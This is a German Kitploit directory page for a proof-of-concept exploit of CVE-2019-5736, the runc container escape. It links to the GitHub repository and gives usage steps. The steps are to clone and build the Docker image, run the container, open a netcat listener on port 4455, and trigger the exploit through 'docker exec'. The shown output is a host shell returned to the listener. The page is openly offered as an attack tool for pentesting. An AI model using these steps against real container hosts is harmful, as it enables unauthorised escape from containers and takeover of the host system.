Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-5736-PoC-2 — Proof-of-Concept-Exploit für CVE-2019-5736, eine Container-Escape-Sicherheitslücke in runc, die Shell-Zugriff auf den Host durch Ausbrechen aus dem Docker-Container ermöglicht. | Kitploit
Tools/GitHubGitHub/yyqs2008/cve-2019-5736-poc-2
Privilege EscalationContainer-SicherheitSchwachstellenanalyseExploitationRed TeamingContainer-Ausbruch
GitHubyyqs2008/cve-2019-5736-poc-2

CVE-2019-5736-PoC-2

Proof-of-Concept-Exploit für CVE-2019-5736, eine Container-Escape-Sicherheitslücke in runc, die Shell-Zugriff auf den Host durch Ausbrechen aus dem Docker-Container ermöglicht.

Repository anzeigen
1vor 7 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Übersicht

Ein Exploit des folgenden Repositorys, der so eingerichtet wurde, dass er in einem Docker-Image läuft.

https://github.com/feexd/pocs

Verwendung

Erstellen des Images

root@kitploit:~
$ git clone https://github.com/k-onishi/CVE-2019-5736-PoC
$ cd CVE-2019-5736-PoC
$ make
$ sudo docker build -t poc .

Ausführung

Container ausführen und auf dem Host einen Port abhören.

root@kitploit:~
# terminal 1
$ sudo docker run poc

# terminal 2
$ nc -lvp 4455
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::4455
Ncat: Listening on 0.0.0.0:4455

Ausführung von runc.

root@kitploit:~
# terminal 3
$ sudo docker ps --format {{.Names}}
modest_lalande
docker exec -it modest_lalande /bin/sh

Die Shell wird an nc zurückgegeben.

root@kitploit:~
# terminal 2
$ nc -lvp 4455
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::4455
Ncat: Listening on 0.0.0.0:4455
sh: このシェルではジョブ制御が無効になっています
sh-4.2#

Testumgebung

root@kitploit:~
$ uname -a
Linux CVE-2019-5736-CentOS 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
$ sudo cat /etc/redhat-release
CentOS Linux release 7.5.1804 (Core)

Demo

Demo

Tool herunterladen